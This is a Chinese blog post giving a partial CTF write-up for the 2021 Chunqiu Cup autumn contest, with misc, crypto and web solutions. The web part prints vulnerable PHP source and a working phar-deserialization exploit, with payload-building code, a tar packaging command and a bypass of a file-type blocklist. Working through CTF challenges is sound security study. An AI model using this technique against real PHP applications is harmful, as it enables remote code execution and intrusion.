[CTF]2021春秋杯网络安全联赛秋季赛 勇者山峰部分writeup

CTF 专栏收录该内容
16 篇文章 1 订阅

MISC

1.Helloshark

题目给出一个图片,010查看尾部有压缩包数据,foremost提取,里面说了密码在图片里,zsteg梭,得到密码很长一串"password:@91902AF23C#276C2FC7EAC615739CC7C0",打开压缩包得到流量包。找了蛮久,在某个tcp追踪流发现
在这里插入图片描述
注意到竖下来有flag字样,一个一个对着打即可得到flag

2.MarioCoin

通过百度,在Google的拓展程序里用MetaMask创建一个账户,然后网络调成Rinkeby,获取私钥,复制地址,然后注册,发现一直提示1,登录也没成功,找大哥拿了一点币,成功注册开始游戏,玩了一会拿到1000多块钱,然后填地址加数字给我自己发钱,然后购买flag即可
在这里插入图片描述
在这里插入图片描述

然后flag就会发到邮箱,得到flag

3.问卷调查

Crypto

1.Vigenere
题目名字维吉尼亚,一看到就下载然后拿到之前下载的离线网址里爆破即可
在这里插入图片描述

WEB

1.Unser_name

F12得到www.zip,直接下载,看源码.

upload.php

<?php
header("Content-type: text/html;charset=utf-8");
error_reporting(0);

function uploadfile(){
    global $_FILES;
    if (uploadfilecheck() && black_key_check()){
        $name = md5("cdusec".$_SERVER["REMOTE_ADDR"]).".gif";
        if(file_exists("upload_file/").$name){
            unlink($name);
        }
        move_uploaded_file($_FILES["file"]["tmp_name"],"upload_file/".$name);
        echo "<script type='text/javascript'>alert('ok');</script>";
    }

}

function black_key_check(){
	$phar_magic="__HALT_COMPILER";
	$zip_magic="PK\x03\x04";
	$gz_magic="\x1f\x8b\x08";
	$bz_magic="BZh";
	$contents = file_get_contents($_FILES["file"]["tmp_name"]);
	if(strpos($contents,$phar_magic)!==false){
		return false;
	}
	if($zip_magic===substr($contents,0,4)){
		return false;
	}
	if($gz_magic===substr($contents,0,3)){
		return false;
	}
	if($bz_magic===substr($contents,0,3)){
		return false;
	}
	exec("tar -tf ".$_FILES["file"]["tmp_name"],$r_array);
	if(in_array(".phar/.metadata",$r_array)){
		return false;
	}
	return true;
}

function uploadfilecheck(){
    global $_FILES;
    $allowedExts = array("gif","jpeg","jpg","png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (empty($extension)){
    }else{
        if (in_array($extension,$allowedExts)){
            return true;
        }else{
            echo '<script type="text/javascript">alert("no");</script>';
            return false;
        }
    }
}
uploadfile();
?>

exists.php

<?php
class name1{
    public $var;
    public function __destruct(){
        echo $this->var;
    }
}
class name2{
    public function __toString(){
        $_POST["func"]();
        return "";
    }
}
header("Content-type: text/html;charset=utf-8");
$ip=$_SERVER['REMOTE_ADDR'];
$find_this = create_function("", 'die(`cat /flag`);');
error_reporting(0);
$filename = $_GET['filename'];
if (!$_GET['ip']){
    echo $ip;
}
if ($filename == NULL){
   die();
}
if (file_exists($filename)){
    echo '<script type="text/javascript">alert("该文件存在");</script>';
}
else{
    echo '<script type="text/javascript">alert("该文件不存在");</script>';
}

在exists.php里给了两个类,总的逻辑比较简单,通过给var赋值然后进入name2调用匿名函数然后拿到flag,能上传文件,有file_exists,很明显的phar反序列化,但是过滤得比较严格,zip,gzip,bzip都不行,但是可以用tar,然后tar这里下面有测.phar/.metadata,测试了一下in_array函数,只要在后面多加几个a就可以绕过检测并且不会影响后续过程,那么先构建个tar文件.
首先

<?php
class name1{
    public $var;
    public function  __construct()
    {
        $this->var=new name2();
    }
}
class name2{
}
file_put_contents(".phar/.metadataa",serialize(new name1()));
?>

然后在linux下打包,

tar -cf test.tar .phar/

得到test.tar,改gif后缀,直接上传,文件名为cdusec+ip的md5值然后.gif,ip直接访问exists.php就能得到。加密后拼接得到文件名cddc9385153d0b6c5c80a6a94dc9219c.gif
访问一手:xxxx/upload_file/cddc9385153d0b6c5c80a6a94dc9219c.gif发现是存在的,那么代表上传成功。先看phpinfo
在这里插入图片描述

因为版本原因,5.5.9和本地7调用匿名函数的方式不同,5是lambda_x,x=1,2,3…,7是lambda_0x,通过本地调试了解如何调用匿名函数,每访问一次exists.php,lambda后的值就会加一,这个具体也没怎么测过,有时候可以有时候不行,索性重开个环境,传完之后直接hackbar传参即可拿到flag,具体看图
在这里插入图片描述

  • 6
    点赞
  • 3
    评论
  • 10
    收藏
  • 打赏
    打赏
  • 扫一扫,分享海报

评论 3 您还未登录,请先 登录 后发表或查看评论
©️2022 CSDN 皮肤主题:游动-白 设计师:我叫白小胖 返回首页

打赏作者

Sapphire037

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值